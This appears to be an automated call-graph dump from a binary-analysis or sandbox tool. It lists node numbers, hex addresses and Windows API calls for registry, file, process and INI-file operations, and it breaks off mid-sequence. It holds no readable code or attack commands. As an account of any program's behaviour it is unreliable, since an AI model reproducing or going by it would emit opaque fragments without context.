94454->94456 94477 5632ee EnterCriticalSection 94455->94477 94492 5550b9 GetModuleHandleW 94456->94492 94459 554f77 94459->94455 94493 5550fd GetModuleHandleExW 94459->94493 94460 555029 94481 555069 94460->94481 94464 555000 94469 555018 94464->94469 94470 5627b1 _abort 5 API calls 94464->94470 94466 554f8b 94466->94460 94466->94464 94478 562538 94466->94478 94467 555046 94484 555078 94467->94484 94468 555072 94501 5720c9 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 94468->94501 94471 5627b1 _abort 5 API calls 94469->94471 94470->94469 94471->94460 94477->94466 94502 562271 94478->94502 94521 563336 LeaveCriticalSection 94481->94521 94483 555042 94483->94467 94483->94468 94522 56399c 94484->94522 94487 5550a6 94490 5550fd _abort 8 API calls 94487->94490 94488 555086 GetPEB 94488->94487 94489 555096 GetCurrentProcess TerminateProcess 94488->94489 94489->94487 94491 5550ae ExitProcess 94490->94491 94492->94459 94494 555127 GetProcAddress 94493->94494 94495 55514a 94493->94495 94496 55513c 94494->94496 94497 555150 FreeLibrary 94495->94497 94498 555159 94495->94498 94496->94495 94497->94498 94499 550e1c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94498->94499 94500 554f83 94499->94500 94500->94455 94505 562220 94502->94505 94504 562295 94504->94464 94506 56222c ___scrt_is_nonwritable_in_current_image 94505->94506 94513 5632ee EnterCriticalSection 94506->94513 94508 56223a 94514 5622c1 94508->94514 94512 562258 __wsopen_s 94512->94504 94513->94508 94517 5622e9 94514->94517 94518 5622e1 94514->94518 94515 550e1c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94516 562247 94515->94516 94520 562265 LeaveCriticalSection _abort 94516->94520 94517->94518 94519 562d58 _free 20 API calls 94517->94519 94518->94515 94519->94518 94520->94512 94521->94483 94523 5639b7 94522->94523 94524 5639c1 94522->94524 94526 550e1c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94523->94526 94529 563367 5 API calls 2 library calls 94524->94529 94528 555082 94526->94528 94527 5639d8 94527->94523 94528->94487 94528->94488 94529->94527 94530 53f48c 94533 53ca50 94530->94533 94534 53ca6b 94533->94534 94535 5814af 94534->94535 94536 581461 94534->94536 94554 53ca90 94534->94554 94597 5b61ff 254 API calls 2 library calls 94535->94597 94539 58146b 94536->94539 94542 581478 94536->94542 94536->94554 94595 5b6690 254 API calls 94539->94595 94556 53cd60 94542->94556 94596 5b6b2d 254 API calls 2 library calls 94542->94596 94545 581742 94545->94545 94546 54e781 39 API calls 94546->94554 94549 53cd8e 94551 58168b 94600 5b6569 81 API calls 94551->94600 94554->94546 94554->94549 94554->94551 94555 53bdc1 39 API calls 94554->94555 94554->94556 94560 53cf30 39 API calls 94554->94560 94562 53be6d 8 API calls 94554->94562 94564 5402f0 94554->94564 94587 54e73b 39 API calls 94554->94587 94588 54aa19 254 API calls 94554->94588 94589 5505d2 5 API calls __Init_thread_wait 94554->94589 94590 54bbd2 8 API calls 94554->94590 94591 550433 29 API calls __onexit 94554->94591 94592 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94554->94592 94593 54f4ed 81 API calls 94554->94593 94594 54f354 254 API calls 94554->94594 94598 53b3fe 8 API calls 94554->94598 94599 58ff4f 8 API calls 94554->94599 94555->94554 94556->94549 94601 5a3ef6 81 API calls __wsopen_s 94556->94601 94560->94554 94562->94554 94583 540326 messages 94564->94583 94565 55016b 8 API calls 94565->94583 94566 5862cf 94668 5a3ef6 81 API calls __wsopen_s 94566->94668 94567 541645 94572 53be6d 8 API calls 94567->94572 94580 54044d messages 94567->94580 94570 585c7f 94576 53be6d 8 API calls 94570->94576 94570->94580 94571 5861fe 94667 5a3ef6 81 API calls __wsopen_s 94571->94667 94572->94580 94576->94580 94577 53be6d 8 API calls 94577->94583 94578 5505d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94578->94583 94579 53bf07 8 API calls 94579->94583 94580->94554 94581 550433 29 API calls pre_c_initialization 94581->94583 94582 5860b9 94665 5a3ef6 81 API calls __wsopen_s 94582->94665 94583->94565 94583->94566 94583->94567 94583->94570 94583->94571 94583->94577 94583->94578 94583->94579 94583->94580 94583->94581 94583->94582 94585 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94583->94585 94586 540a5e messages 94583->94586 94602 541940 94583->94602 94664 541e00 40 API calls messages 94583->94664 94585->94583 94666 5a3ef6 81 API calls __wsopen_s 94586->94666 94587->94554 94588->94554 94589->94554 94590->94554 94591->94554 94592->94554 94593->94554 94594->94554 94595->94542 94596->94556 94597->94554 94598->94554 94599->94554 94600->94556 94601->94545 94603 541966 94602->94603 94604 5419de 94602->94604 94605 586b04 94603->94605 94606 541973 94603->94606 94607 5869f1 94604->94607 94623 5419ed 94604->94623 94685 5b84db 254 API calls 2 library calls 94605->94685 94615 586b28 94606->94615 94616 54197d 94606->94616 94609 586af8 94607->94609 94610 5869fc 94607->94610 94684 5a3ef6 81 API calls __wsopen_s 94609->94684 94683 54b2d6 254 API calls 94610->94683 94612 586b59 94617 586b64 94612->94617 94618 586b86 94612->94618 94613 5402f0 254 API calls 94613->94623 94615->94612 94622 586b40 94615->94622 94621 53be6d 8 API calls 94616->94621 94663 541990 messages 94616->94663 94687 5b84db 254 API calls 2 library calls 94617->94687 94688 5b5fe6 8 API calls 94618->94688 94620 541b65 94620->94583 94621->94663 94686 5a3ef6 81 API calls __wsopen_s 94622->94686 94623->94613 94623->94620 94624 58691d 94623->94624 94629 5868ac 94623->94629 94641 541b59 94623->94641 94647 541aa4 94623->94647 94623->94663 94682 5a3ef6 81 API calls __wsopen_s 94624->94682 94626 586d7d 94634 586db3 94626->94634 94788 5b80ce 65 API calls 94626->94788 94627 586b91 94632 586c25 94627->94632 94642 586bac 94627->94642 94681 5a3ef6 81 API calls __wsopen_s 94629->94681 94760 5a19ed 8 API calls 94632->94760 94790 53b3fe 8 API calls 94634->94790 94635 586d5b 94764 538e70 94635->94764 94638 53be6d 8 API calls 94638->94663 94640 586d91 94643 538e70 52 API calls 94640->94643 94641->94620 94680 5a3ef6 81 API calls __wsopen_s 94641->94680 94689 5a13a0 8 API calls 94642->94689 94658 586d99 _wcslen 94643->94658 94646 586c37 94761 53bc9b 8 API calls 94646->94761 94647->94641 94669 541c50 94647->94669 94649 5868c1 messages 94649->94624 94659 541b12 messages 94649->94659 94661 5419d3 messages 94649->94661 94652 541b05 94652->94641 94652->94659 94653 586d63 _wcslen 94653->94626 94787 53b3fe 8 API calls 94653->94787 94654 586bd6 94690 542ad0 94654->94690 94655 586c40 94762 5a13a0 8 API calls 94655->94762 94658->94634 94789 53b3fe 8 API calls 94658->94789 94659->94638 94659->94661 94659->94663 94661->94583 94663->94626 94663->94661 94763 5b7f8f 53 API calls __wsopen_s 94663->94763 94664->94583 94665->94586 94666->94580 94667->94580 94668->94580 94670 541c62 94669->94670 94673 541c6b 94670->94673 94791 54b71c 8 API calls 94670->94791 94672 541d20 94672->94652 94673->94672 94674 55016b 8 API calls 94673->94674 94675 541d89 94674->94675 94676 55016b 8 API calls 94675->94676 94677 541d92 94676->94677 94678 53b25f 8 API calls 94677->94678 94679 541da1 94678->94679 94679->94652 94680->94661 94681->94649 94682->94663 94683->94659 94684->94605 94685->94663 94686->94661 94687->94663 94688->94627 94689->94654 94691 542b36 94690->94691 94692 542f70 94690->94692 94694 587b7c 94691->94694 94695 542b50 94691->94695 95132 5505d2 5 API calls __Init_thread_wait 94692->95132 95137 5b79f9 254 API calls 94694->95137 94698 5430e0 9 API calls 94695->94698 94697 542f7a 94701 53b25f 8 API calls 94697->94701 94705 542fbb 94697->94705 94700 542b60 94698->94700 94699 587b88 94699->94663 94702 5430e0 9 API calls 94700->94702 94710 542f94 94701->94710 94703 542b76 94702->94703 94703->94705 94706 542bac 94703->94706 94704 587b91 95138 5a3ef6 81 API calls __wsopen_s 94704->95138 94705->94704 94707 542fec 94705->94707 94706->94704 94730 542bc8 __fread_nolock 94706->94730 95134 53b3fe 8 API calls 94707->95134 95133 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94710->95133 94712 542ff9 95135 54e662 254 API calls 94712->95135 94713 587bb9 95139 5a3ef6 81 API calls __wsopen_s 94713->95139 94715 542cef 94717 587c1c 94715->94717 94718 542cfc 94715->94718 95141 5b60a2 53 API calls _wcslen 94717->95141 94719 5430e0 9 API calls 94718->94719 94721 542d09 94719->94721 94724 587d45 94721->94724 94726 5430e0 9 API calls 94721->94726 94722 55016b 8 API calls 94722->94730 94723 55019b 8 API calls 94723->94730 94734 587bb4 94724->94734 95142 5a3ef6 81 API calls __wsopen_s 94724->95142 94725 543032 95136 54fe59 8 API calls 94725->95136 94732 542d23 94726->94732 94729 5402f0 254 API calls 94729->94730 94730->94712 94730->94713 94730->94715 94730->94722 94730->94723 94730->94729 94731 587bfd 94730->94731 94730->94734 95140 5a3ef6 81 API calls __wsopen_s 94731->95140 94732->94724 94735 53be6d 8 API calls 94732->94735 94737 542d87 messages 94732->94737 94734->94663 94735->94737 94736 5430e0 9 API calls 94736->94737 94737->94724 94737->94725 94737->94734 94737->94736 94740 542e3b messages 94737->94740 94741 537953 CloseHandle 94737->94741 94792 5a65b4 94737->94792 94797 54f95e 94737->94797 94804 5bcd16 94737->94804 94893 5a4ad5 94737->94893 94898 5a5ed5 94737->94898 94928 5a874a 94737->94928 94955 5a6561 94737->94955 94962 59e9c5 GetFileAttributesW 94737->94962 94964 5ba4b4 94737->94964 94970 5b9eea 94737->94970 94973 5beb63 94737->94973 95009 5bac49 94737->95009 95014 537923 94737->95014 95019 5ba8ae 94737->95019 95027 5a8e39 94737->95027 95046 54be75 94737->95046 95103 5a6d2d 94737->95103 95116 5a95f6 94737->95116 94738 542edd 94738->94663 94740->94738 95131 54e29c 8 API calls messages 94740->95131 94741->94737 94760->94646 94761->94655 94762->94663 94763->94635 94765 538e85 94764->94765 94781 538e82 94764->94781 94766 538ebb 94765->94766 94767 538e8d 94765->94767 94770 538ecd 94766->94770 94776 576b10 94766->94776 94778 576a29 94766->94778 95703 555556 26 API calls 94767->95703 95704 54fe8f 51 API calls 94770->95704 94771 538e9d 94775 55016b 8 API calls 94771->94775 94772 576b28 94772->94772 94777 538ea7 94775->94777 95706 555513 26 API calls 94776->95706 94779 53b25f 8 API calls 94777->94779 94780 55019b 8 API calls 94778->94780 94786 576aa2 94778->94786 94779->94781 94782 576a72 94780->94782 94781->94653 94783 55016b 8 API calls 94782->94783 94784 576a99 94783->94784 94785 53b25f 8 API calls 94784->94785 94785->94786 95705 54fe8f 51 API calls 94786->95705 94787->94626 94788->94640 94789->94634 94790->94661 94791->94673 94793 538e70 52 API calls 94792->94793 94794 5a65c7 94793->94794 95143 59e387 lstrlenW 94794->95143 94796 5a65d1 94796->94737 95148 53c92d 94797->95148 94799 54f972 94800 58fac0 Sleep 94799->94800 94801 54f97a timeGetTime 94799->94801 94802 53c92d 39 API calls 94801->94802 94803 54f990 94802->94803 94803->94737 94805 53bf07 8 API calls 94804->94805 94806 5bcd39 94805->94806 94807 53bf07 8 API calls 94806->94807 94808 5bcd42 94807->94808 94809 53bf07 8 API calls 94808->94809 94810 5bcd4b 94809->94810 94811 538e70 52 API calls 94810->94811 94820 5bcdda 94810->94820 94812 5bcd71 94811->94812 95154 5bd6b1 94812->95154 94814 5bcda5 95180 5bd2f7 94814->95180 94816 5bcdd6 94817 5bce0f RegConnectRegistryW 94816->94817 94818 5bce76 RegCreateKeyExW 94816->94818 94816->94820 94817->94818 94817->94820 94821 5bcf0e 94818->94821 94830 5bcead 94818->94830 94820->94737 94822 5bd1d6 RegCloseKey 94821->94822 94824 538e70 52 API calls 94821->94824 94822->94820 94823 5bd1e9 RegCloseKey 94822->94823 94823->94820 94825 5bcf29 94824->94825 94826 554db8 _strftime 40 API calls 94825->94826 94827 5bcf38 94826->94827 94828 5bcf96 94827->94828 94829 5bcf44 94827->94829 94832 538e70 52 API calls 94828->94832 94833 538e70 52 API calls 94829->94833 94830->94820 94831 5bceff RegCloseKey 94830->94831 94831->94820 94834 5bcfa0 94832->94834 94835 5bcf4e _wcslen 94833->94835 94836 554db8 _strftime 40 API calls 94834->94836 94840 538e70 52 API calls 94835->94840 94837 5bcfaf 94836->94837 94838 5bcfbf 94837->94838 94839 5bd047 94837->94839 94842 538e70 52 API calls 94838->94842 94841 538e70 52 API calls 94839->94841 94843 5bcf70 94840->94843 94844 5bd051 94841->94844 94846 538e70 52 API calls 94843->94846 94892 5bcf85 94846->94892 94894 538e70 52 API calls 94893->94894 94895 5a4ae8 94894->94895 95220 59da81 94895->95220 94897 5a4af0 94897->94737 94899 5a5fbd 94898->94899 94900 5a5ef4 94898->94900 94903 538e70 52 API calls 94899->94903 94911 5a6011 94899->94911 94901 53c92d 39 API calls 94900->94901 94902 5a5eff 94901->94902 94904 53c92d 39 API calls 94902->94904 94905 5a5fef 94903->94905 94906 5a5f15 94904->94906 94907 538e70 52 API calls 94905->94907 94906->94899 94910 53bf07 8 API calls 94906->94910 94908 5a6001 94907->94908 95232 59d836 94908->95232 94912 5a5f26 94910->94912 94911->94737 94913 53bf07 8 API calls 94912->94913 94914 5a5f2f 94913->94914 94915 538e70 52 API calls 94914->94915 94916 5a5f3c 94915->94916 94917 53694e 8 API calls 94916->94917 94918 5a5f4f 94917->94918 94919 537af4 8 API calls 94918->94919 94920 5a5f60 94919->94920 94927 5a5f89 94920->94927 95275 59dc8e 94920->95275 94922 53c92d 39 API calls 94922->94899 94924 53b25f 8 API calls 94925 5a5f80 94924->94925 94926 59da81 12 API calls 94925->94926 94926->94927 94927->94922 94929 5a875a __wsopen_s 94928->94929 94930 538e70 52 API calls 94929->94930 94931 5a877b 94930->94931 94932 53c92d 39 API calls 94931->94932 94939 5a8799 94931->94939 94932->94939 94933 538e70 52 API calls 94934 5a887c 94933->94934 94935 53557e 9 API calls 94934->94935 94936 5a88a7 94935->94936 95345 55d913 94936->95345 94938 5a88cd 94940 5a88f7 GetCurrentDirectoryW SetCurrentDirectoryW 94938->94940 94939->94933 94947 5a8973 94939->94947 94941 5a8921 94940->94941 94940->94947 94942 59e387 4 API calls 94941->94942 94943 5a892a 94942->94943 94944 59e9c5 GetFileAttributesW 94943->94944 94943->94947 94945 5a8938 94944->94945 94946 5a8940 GetFileAttributesW SetFileAttributesW 94945->94946 94954 5a89cb 94945->94954 94948 5a8969 SetCurrentDirectoryW 94946->94948 94949 5a89b1 94946->94949 94947->94737 94948->94947 94951 5a8a02 SetCurrentDirectoryW 94949->94951 94952 5a89b5 SetCurrentDirectoryW 94949->94952 94951->94947 94952->94954 94953 5a89ea 94953->94951 95348 5a9f9f FindFirstFileW 94954->95348 94956 538e70 52 API calls 94955->94956 94957 5a6577 94956->94957 95392 59db69 94957->95392 94959 5a657f 94960 5a6583 GetLastError 94959->94960 94961 5a6598 94959->94961 94960->94961 94961->94737 94963 59e9d1 94962->94963 94963->94737 94968 5ba4c7 94964->94968 94965 538e70 52 API calls 94966 5ba534 94965->94966 95417 5a17be 94966->95417 94968->94965 94969 5ba4d6 94968->94969 94969->94737 95458 5b88b6 94970->95458 94972 5b9efa 94972->94737 94974 53bf07 8 API calls 94973->94974 94975 5beb7a 94974->94975 94976 538e70 52 API calls 94975->94976 94977 5beb89 94976->94977 95568 537a14 94977->95568 94980 538e70 52 API calls 94981 5beba9 94980->94981 94982 5bebc1 94981->94982 94983 5bec26 94981->94983 94985 53c92d 39 API calls 94982->94985 94984 538e70 52 API calls 94983->94984 94986 5bec2b 94984->94986 94987 5bebc6 94985->94987 94988 5bec38 94986->94988 94989 5bec73 94986->94989 94987->94988 94991 5bebdf 94987->94991 94990 536ab6 8 API calls 94988->94990 94992 5bec8b 94989->94992 94993 53c92d 39 API calls 94989->94993 95005 5bec45 94990->95005 94994 538685 8 API calls 94991->94994 94995 53c92d 39 API calls 94992->94995 95000 5beca4 94992->95000 94993->94992 94997 5bebec 94994->94997 94995->95000 94996 53be6d 8 API calls 94998 5becbe 94996->94998 94999 537af4 8 API calls 94997->94999 95573 599b57 94998->95573 95002 5bebfa 94999->95002 95000->94996 95003 538685 8 API calls 95002->95003 95004 5bec13 95003->95004 95006 537af4 8 API calls 95004->95006 95005->94737 95007 5bec21 95006->95007 95592 537a59 95007->95592 95010 538e70 52 API calls 95009->95010 95011 5bac65 95010->95011 95598 59dc9c CreateToolhelp32Snapshot Process32FirstW 95011->95598 95013 5bac74 95013->94737 95015 537953 CloseHandle 95014->95015 95016 53792b 95015->95016 95017 537953 CloseHandle 95016->95017 95018 53793a messages 95017->95018 95018->94737 95020 5ba90a 95019->95020 95026 5ba8ca 95019->95026 95021 5ba928 95020->95021 95022 53c92d 39 API calls 95020->95022 95023 53c92d 39 API calls 95021->95023 95024 5ba990 95021->95024 95021->95026 95022->95021 95023->95024 95616 5a0287 95024->95616 95026->94737 95028 53bf07 8 API calls 95027->95028 95029 5a8e4a 95028->95029 95030 55019b 8 API calls 95029->95030 95031 5a8e54 95030->95031 95032 5341a6 8 API calls 95031->95032 95033 5a8e5e 95032->95033 95034 538e70 52 API calls 95033->95034 95035 5a8e6d 95034->95035 95036 53557e 9 API calls 95035->95036 95037 5a8e78 95036->95037 95038 538e70 52 API calls 95037->95038 95039 5a8e85 95038->95039 95040 538e70 52 API calls 95039->95040 95041 5a8e97 95040->95041 95042 538e70 52 API calls 95041->95042 95043 5a8eac GetPrivateProfileStringW 95042->95043 95044 536ab6 8 API calls 95043->95044 95045 5a8ecf messages 95044->95045 95045->94737 95047 536ab6 8 API calls 95046->95047 95048 54be8d 95047->95048 95049 55016b 8 API calls 95048->95049 95053 588f7a 95048->95053 95051 54bea6 95049->95051 95052 55019b 8 API calls 95051->95052 95054 54beb7 95052->95054 95093 54bf1f 95053->95093 95673 5aa607 39 API calls 95053->95673 95055 537953 CloseHandle 95054->95055 95057 54bec2 95055->95057 95056 53c92d 39 API calls 95058 588fdc 95056->95058 95059 53bf07 8 API calls 95057->95059 95060 54bf2c 95058->95060 95061 588fe4 95058->95061 95062 54beca 95059->95062 95063 54fdc9 3 API calls 95060->95063 95064 53c92d 39 API calls 95061->95064 95065 537953 CloseHandle 95062->95065 95070 54bf33 95063->95070 95064->95070 95066 54bed1 95065->95066 95067 538e70 52 API calls 95066->95067 95068 54bedd 95067->95068 95069 537953 CloseHandle 95068->95069 95071 54bee7 95069->95071 95072 588ff9 95070->95072 95073 54bf4e 95070->95073 95074 536e52 5 API calls 95071->95074 95076 55019b 8 API calls 95072->95076 95075 537a14 8 API calls 95073->95075 95077 54bef8 95074->95077 95078 54bf56 95075->95078 95079 588ffe 95076->95079 95080 54bf00 95077->95080 95081 588f72 95077->95081 95657 54bfbc 95078->95657 95086 5341c9 2 API calls 95079->95086 95087 589012 95079->95087 95088 536b12 13 API calls 95080->95088 95084 537923 CloseHandle 95081->95084 95084->95053 95085 54bf65 95089 537a59 8 API calls 95085->95089 95092 589016 __fread_nolock 95085->95092 95086->95087 95087->95092 95674 5a1759 8 API calls ___scrt_fastfail 95087->95674 95090 54bf0e 95088->95090 95094 54bf79 95089->95094 95671 536afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 95090->95671 95093->95056 95093->95060 95095 54bfb3 95094->95095 95098 537953 CloseHandle 95094->95098 95095->94737 95096 588f3b 95672 59d4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 95096->95672 95097 54bf15 95097->95093 95097->95096 95099 54bfa7 95098->95099 95099->95095 95102 537923 CloseHandle 95099->95102 95101 588f52 95101->95093 95102->95095 95104 538e70 52 API calls 95103->95104 95105 5a6d47 95104->95105 95106 5a6d84 95105->95106 95107 53c92d 39 API calls 95105->95107 95698 59e783 95106->95698 95109 5a6d76 95107->95109 95109->95106 95111 53557e 9 API calls 95109->95111 95111->95106 95112 537a59 8 API calls 95114 5a6dd7 95112->95114 95113 538e70 52 API calls 95115 5a6d92 95113->95115 95114->94737 95115->95112 95117 53bf07 8 API calls 95116->95117 95118 5a9607 95117->95118 95119 538e70 52 API calls 95118->95119 95120 5a9616 95119->95120 95121 53557e 9 API calls 95120->95121 95122 5a9621 95121->95122 95123 538e70 52 API calls 95122->95123 95124 5a962e 95123->95124 95125 538e70 52 API calls 95124->95125 95126 5a9640 95125->95126 95127 538e70 52 API calls 95126->95127 95128 5a9655 WritePrivateProfileStringW 95127->95128 95129 5a966b WritePrivateProfileStringW 95128->95129 95130 5a9677 95128->95130 95129->95130 95130->94737 95131->94740 95132->94697 95133->94705 95134->94712 95135->94725 95136->94725 95137->94699 95138->94734 95139->94734 95140->94734 95141->94732 95142->94734 95144 59e3a5 GetFileAttributesW 95143->95144 95145 59e3cf 95143->95145 95144->95145 95146 59e3b1 FindFirstFileW 95144->95146 95145->94796 95146->95145 95147 59e3c2 FindClose 95146->95147 95147->95145 95149 53c93e 95148->95149 95150 53c945 95148->95150 95149->95150 95153 556661 39 API calls _strftime 95149->95153 95150->94799 95152 53c988 95152->94799 95153->95152 95155 53bceb 8 API calls 95154->95155 95156 5bd6bf 95155->95156 95157 53bceb 8 API calls 95156->95157 95158 5bd6c7 95157->95158 95159 53bceb 8 API calls 95158->95159 95160 5bd6cf 95159->95160 95161 5bd737 95160->95161 95162 53627c 8 API calls 95160->95162 95163 53bceb 8 API calls 95161->95163 95164 5bd6e5 95162->95164 95167 5bd735 95163->95167 95164->95161 95165 53627c 8 API calls 95164->95165 95166 5bd6f7 95165->95166 95166->95161 95168 5bd6fc 95166->95168 95169 538685 8 API calls 95167->95169 95170 5396d9 8 API calls 95168->95170 95171 5bd760 95169->95171 95175 5bd707 95170->95175 95172 538685 8 API calls 95171->95172 95173 5bd777 95172->95173 95174 5379ed 8 API calls 95173->95174 95176 5bd780 95174->95176 95177 538685 8 API calls 95175->95177 95176->94814 95178 5bd728 95177->95178 95179 5396d9 8 API calls 95178->95179 95179->95167 95181 53c269 8 API calls 95180->95181 95182 5bd30e CharUpperBuffW 95181->95182 95183 5bd329 95182->95183 95184 53bf07 8 API calls 95183->95184 95185 5bd334 95184->95185 95186 538685 8 API calls 95185->95186 95187 5bd347 _wcslen 95186->95187 95188 5379ed 8 API calls 95187->95188 95189 5bd3a4 _wcslen 95187->95189 95188->95189 95189->94816 95221 5379ed 8 API calls 95220->95221 95222 59dab6 GetFileAttributesW 95221->95222 95223 59daca GetLastError 95222->95223 95226 59dae3 95222->95226 95224 59dae5 95223->95224 95225 59dad7 CreateDirectoryW 95223->95225 95224->95226 95227 5396d9 8 API calls 95224->95227 95225->95224 95225->95226 95226->94897 95228 59db27 95227->95228 95229 59da81 8 API calls 95228->95229 95230 59db30 95229->95230 95230->95226 95231 59db34 CreateDirectoryW 95230->95231 95231->95226 95233 53bf07 8 API calls 95232->95233 95234 59d853 95233->95234 95235 53bf07 8 API calls 95234->95235 95236 59d85b 95235->95236 95237 53bf07 8 API calls 95236->95237 95238 59d863 95237->95238 95239 53557e 9 API calls 95238->95239 95240 59d86d 95239->95240 95241 53557e 9 API calls 95240->95241 95242 59d877 95241->95242 95278 59e958 95242->95278 95244 59d882 95245 59e9c5 GetFileAttributesW 95244->95245 95246 59d88d 95245->95246 95247 59d89f 95246->95247 95248 5365a4 8 API calls 95246->95248 95249 59e9c5 GetFileAttributesW 95247->95249 95248->95247 95250 59d8a7 95249->95250 95251 59d8b4 95250->95251 95253 5365a4 8 API calls 95250->95253 95252 53bf07 8 API calls 95251->95252 95254 59d8bc 95252->95254 95253->95251 95255 53bf07 8 API calls 95254->95255 95256 59d8c4 95255->95256 95257 53694e 8 API calls 95256->95257 95258 59d8d5 FindFirstFileW 95257->95258 95259 59da23 FindClose 95258->95259 95271 59d8f8 95258->95271 95270 59da21 95259->95270 95260 59d9ef FindNextFileW 95260->95271 95261 53b25f 8 API calls 95261->95271 95263 537af4 8 API calls 95263->95271 95264 5365a4 8 API calls 95264->95271 95265 59dc8e 4 API calls 95265->95271 95266 59da12 FindClose 95266->95270 95267 59d984 95269 54e2e5 41 API calls 95267->95269 95272 59d9ad MoveFileW 95267->95272 95273 59d99d DeleteFileW 95267->95273 95268 59da5c CopyFileExW 95268->95271 95269->95267 95270->94911 95271->95259 95271->95260 95271->95261 95271->95263 95271->95264 95271->95265 95271->95266 95271->95267 95271->95268 95274 59d9ca DeleteFileW 95271->95274 95289 59df85 95271->95289 95272->95271 95273->95271 95274->95271 95276 59e387 4 API calls 95275->95276 95277 59dc95 95276->95277 95277->94924 95277->94927 95279 53bf07 8 API calls 95278->95279 95280 59e96d 95279->95280 95281 53bf07 8 API calls 95280->95281 95282 59e975 95281->95282 95283 53694e 8 API calls 95282->95283 95284 59e984 95283->95284 95285 53694e 8 API calls 95284->95285 95286 59e994 95285->95286 95287 54e2e5 41 API calls 95286->95287 95288 59e9a9 95287->95288 95288->95244 95290 59dfa1 95289->95290 95291 59dfbc 95290->95291 95292 59dfa6 95290->95292 95293 53bf07 8 API calls 95291->95293 95294 53be6d 8 API calls 95292->95294 95342 59dfb7 95292->95342 95295 59dfc4 95293->95295 95294->95342 95296 53bf07 8 API calls 95295->95296 95297 59dfcc 95296->95297 95298 53bf07 8 API calls 95297->95298 95342->95271 95362 55d6be 95345->95362 95349 5aa03a FindClose 95348->95349 95353 5a9fc9 95348->95353 95350 5aa04b FindFirstFileW 95349->95350 95351 5aa0e2 95349->95351 95359 5aa060 95350->95359 95361 5aa0d9 FindClose 95350->95361 95351->94953 95352 5aa028 FindNextFileW 95352->95349 95352->95353 95353->95352 95356 5a9ff7 GetFileAttributesW SetFileAttributesW 95353->95356 95355 5aa0c7 FindNextFileW 95355->95359 95355->95361 95356->95353 95357 5aa0eb FindClose 95356->95357 95357->95351 95358 5aa0a0 SetCurrentDirectoryW 95358->95359 95359->95355 95359->95358 95360 5aa0c0 SetCurrentDirectoryW 95359->95360 95359->95361 95360->95355 95361->95351 95363 55d6d5 95362->95363 95364 55d89f 95362->95364 95363->95364 95368 55d740 95363->95368 95390 55f669 20 API calls __dosmaperr 95364->95390 95366 55d8af 95391 562b7c 26 API calls __cftof 95366->95391 95369 55d764 95368->95369 95376 55d78b 95368->95376 95385 565153 26 API calls 2 library calls 95368->95385 95384 55f669 20 API calls __dosmaperr 95369->95384 95371 55d868 95371->95369 95374 55d87b 95371->95374 95378 55d774 95371->95378 95372 55d820 95372->95369 95375 55d841 95372->95375 95387 565153 26 API calls 2 library calls 95372->95387 95389 565153 26 API calls 2 library calls 95374->95389 95375->95369 95375->95378 95380 55d857 95375->95380 95376->95369 95383 55d7fd 95376->95383 95386 565153 26 API calls 2 library calls 95376->95386 95378->94938 95388 565153 26 API calls 2 library calls 95380->95388 95383->95371 95383->95372 95384->95378 95385->95376 95386->95383 95387->95375 95388->95378 95389->95378 95390->95366 95391->95378 95393 53bf07 8 API calls 95392->95393 95394 59db88 95393->95394 95395 53bf07 8 API calls 95394->95395 95396 59db91 95395->95396 95397 53bf07 8 API calls 95396->95397 95398 59db9a 95397->95398 95399 53557e 9 API calls 95398->95399 95400 59dba5 95399->95400 95401 59e9c5 GetFileAttributesW 95400->95401 95402 59dbae 95401->95402 95403 59dbc0 95402->95403 95404 5365a4 8 API calls 95402->95404 95405 53694e 8 API calls 95403->95405 95404->95403 95406 59dbd4 FindFirstFileW 95405->95406 95407 59dc60 FindClose 95406->95407 95411 59dbf3 95406->95411 95413 59dc6b 95407->95413 95408 59dc3b FindNextFileW 95409 59dc4f 95408->95409 95408->95411 95409->95411 95410 53be6d 8 API calls 95410->95411 95411->95407 95411->95408 95411->95410 95412 537af4 8 API calls 95411->95412 95414 5365a4 8 API calls 95411->95414 95412->95411 95413->94959 95415 59dc2c DeleteFileW 95414->95415 95415->95408 95416 59dc57 FindClose 95415->95416 95416->95413 95418 5a17cb 95417->95418 95419 55016b 8 API calls 95418->95419 95420 5a17d2 95419->95420 95423 59fbca 95420->95423 95422 5a180c 95422->94969 95424 53c269 8 API calls 95423->95424 95425 59fbdd CharLowerBuffW 95424->95425 95429 59fbf0 95425->95429 95426 53627c 8 API calls 95426->95429 95427 59fbfa ___scrt_fastfail 95427->95422 95428 59fc2e 95431 53627c 8 API calls 95428->95431 95433 59fc40 95428->95433 95429->95426 95429->95427 95429->95428 95430 55019b 8 API calls 95432 59fc6e 95430->95432 95431->95433 95437 59fc90 95432->95437 95456 59fb02 8 API calls 95432->95456 95433->95430 95436 59fccd 95436->95427 95438 55016b 8 API calls 95436->95438 95441 59fd21 95437->95441 95439 59fce7 95438->95439 95440 55019b 8 API calls 95439->95440 95440->95427 95442 53bf07 8 API calls 95441->95442 95443 59fd53 95442->95443 95444 53bf07 8 API calls 95443->95444 95445 59fd5c 95444->95445 95446 53bf07 8 API calls 95445->95446 95452 59fd65 95446->95452 95447 5384b7 8 API calls 95447->95452 95448 5a0029 95448->95436 95449 53acc0 8 API calls 95449->95452 95450 556718 GetStringTypeW 95450->95452 95452->95447 95452->95448 95452->95449 95452->95450 95453 556661 39 API calls 95452->95453 95454 59fd21 40 API calls 95452->95454 95455 53be6d 8 API calls 95452->95455 95457 556742 GetStringTypeW _strftime 95452->95457 95453->95452 95454->95452 95455->95452 95456->95432 95457->95452 95459 538e70 52 API calls 95458->95459 95460 5b88ed 95459->95460 95478 5b8932 messages 95460->95478 95496 5b9632 95460->95496 95462 5b8bde 95463 5b8dac 95462->95463 95468 5b8bec 95462->95468 